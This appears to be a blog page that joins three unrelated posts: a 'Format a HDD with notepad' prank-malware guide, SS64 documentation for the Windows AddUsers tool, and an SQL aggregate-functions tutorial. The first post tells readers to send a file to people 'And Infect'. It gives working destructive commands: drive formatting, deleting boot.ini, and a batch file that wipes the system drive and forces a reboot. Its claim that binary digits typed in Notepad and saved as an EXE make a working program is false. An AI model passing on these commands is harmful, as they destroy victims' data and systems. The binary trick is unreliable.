Wednesday, 23 January 2019

Format a HDD with notepad


Format a HDD with notepad




Format a HDD with notepad

Step 1.

Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000

Step 2.


Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect

OR


IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\



01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.



01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest

cant spoonfeed

its workin

Do not try it on ur PC. dont mess around this is for educational purpose only


still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat

worse


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


Reply With Quote

AddUsers - Add multiple user accounts

AddUsers - Add multiple user accounts 

ADDUSERS.exe (Resource Kit)
ADDUSERS - Automate the creation of a large number of users
Syntax

  Create Users:

            AddUsers /c filename [/s:x] [/?] Domain Password_options
  Dump to file:
            AddUsers /d{:u} filename [/s:x] [/?] Domain Password_options
  Erase Users:
            AddUsers /e filename [/s:x] [/?] Domain Password_options
key
   Filename   - The comma-delimited file that AddUsers uses for data.

   /s:x       - Change the delimiter character used in filename to x.
 e.g. /s:~ would make the delimiter "~"

   Domain     - Query the Primary Domain Controller (PDC) of domain.
                You can also use \\Servername to specify the machine where user accounts are created or read.
                AddUsers will use the local computer by default (if you do not specify Domain)

   /c         - Create user accounts, local groups, and global groups as specified by filename.

   /d{:u}     - Dump user accounts, local groups, and global groups to filename.The (:u) is an optional switch that causes current accounts to be written to

    the specified file in Unicode text format. Choosing to dump current user
    accounts does not save the account's passwords or any security information
    for the accounts.
    Note: Password information is not saved in a user account dump and if you
    use the same file to create accounts, all passwords of newly created
    accounts will be empty. To back up security information for accounts, use a
    Tape Backup.
   /e         - Erase the user accounts specified in the file name.
                CAUTION: Be careful when erasing user accounts, as it is not possible to recreate
 an account with the same SID. This option will not erase built-in accounts.


 Password_options
   /p:        - Set account creation options, used along with any combination of the following:
      * l     - Users do not have to change passwords at next logon.
      * c     - Users cannot change passwords.
      * e     - Passwords never expire. (implies l option)
      * d     - Accounts disabled.
                By default, all created users are required to change their password at logon.
Example
Create a comma-delimited text file, which contains the new users to be created.
Following the Syntax as follows:
[Users]
User Name,Full name, Password, Description, HomeDrive, Homepath, Profile, Script
e.g.
[User]
jimmye,James Edward Phillip II,,,,,,
alexd,Alex Denuur,,,E:\,E:\users\alexd,,
ronj,Ron Jarook,ChangeThis,,E:\,E:\users\ronj,,
sarahs,Sarah Smith,,,,,,
u0123,Mike Olarte,,,,,,
Save the file as C:\Users.txt and execute the command
AddUsers MyDomain /c c:\Users.txt /p:e
Related Commands:

Q199878 - further examples of ADDUSERS
DSADD - Add user (computer, group..) in active directory
CSVDE - Import and export from Active Directory.

Equivalent Linux BASH commands:

useradd - Create new user accounts






Simon Sheppard
SS64.com

Thursday, 3 January 2019

Aggregate Functions

1. AVERAGE()
The AVG() function returns the average value of a numeric column. Syntax
SELECT AVG(column_name) FROM table_name;
SELECT AVG(OrderPrice) AS OrderAverage FROM Orders
Order Average = 950
2. MIN()
The MIN() function returns the smallest value of the selected column. Syntax
SELECT MIN(column_name) FROM table_name
SELECT MIN(OrderPrice) AS SmallestOrderPrice FROM Orders
SmallestOrderPrice = 100
3. MAX()
The MAX() function returns the largest value of the selected column. Syntax
SELECT MAX(column_name) FROM table_name
SELECT MAX(OrderPrice) AS LargestOrderPrice FROM Orders
LargestOrderPrice = 2000
4. COUNT()
The COUNT() function returns the number of rows that matches a specified criteria. The
COUNT(column_name) function returns the number of values (NULL values will not be counted) of the
specified column:
SELECT COUNT(column_name) FROM table_name
SELECT COUNT(Customer) AS CustomerNilsen FROM Orders
WHERE Customer='Nilsen'
Custiomer Nilsen = 2
The COUNT(*) function returns the number of records in a table
SELECT COUNT(*) FROM table_name
SELECT COUNT(*) AS NumberOfOrders FROM Orders
NumberOfOrders = 6




5. SUM()
The SUM() function returns the total sum of a numeric column. Syntax
SELECT SUM(column_name) FROM table_name
SELECT SUM(OrderPrice) AS OrderTotal FROM Orders
OrderTotal = 5700
6. GREATEST()
The greatest function returns the greatest value in a list of expressions. The syntax for the greatest function
is:
greatest( expr1, expr2, ... expr_n )
expr1, expr2, . expr_n are expressions that are evaluated by the greatest function. If the datatypes of the
expressions are different, all expressions will be converted to whatever datatype expr1 is. If the comparison
is based on a character comparison, one character is considered greater than another if it has a higher
character set value. For example:
greatest(2, 5, 12, 3) would return 12
greatest('2', '5', '12', '3') would return '5'
greatest('apples', 'oranges', 'bananas') would return 'oranges'
greatest('apples', 'applis', 'applas') would return 'applis'
7. LEAST()
The least function returns the smallest value in a list of expressions. The syntax for the least function is:
least( expr1, expr2, ... expr_n )
expr1, expr2, . expr_n are expressions that are evaluated by the least function. If the datatypes of the
expressions are different, all expressions will be converted to whatever datatype expr1 is. If the comparison
is based on a character comparison, one character is considered smaller than another if it has a lower
character set value.
Note: Having a NULL value in one of the expressions will return NULL as the least value.
For example:
least(2, 5, 12, 3) would return 2
least('2', '5', '12', '3') would return '12'
least('apples', 'oranges', 'bananas') would return 'apples'
least('apples', 'applis', 'applas') would return 'applas'
least('apples', 'applis', 'applas', null) would return NULL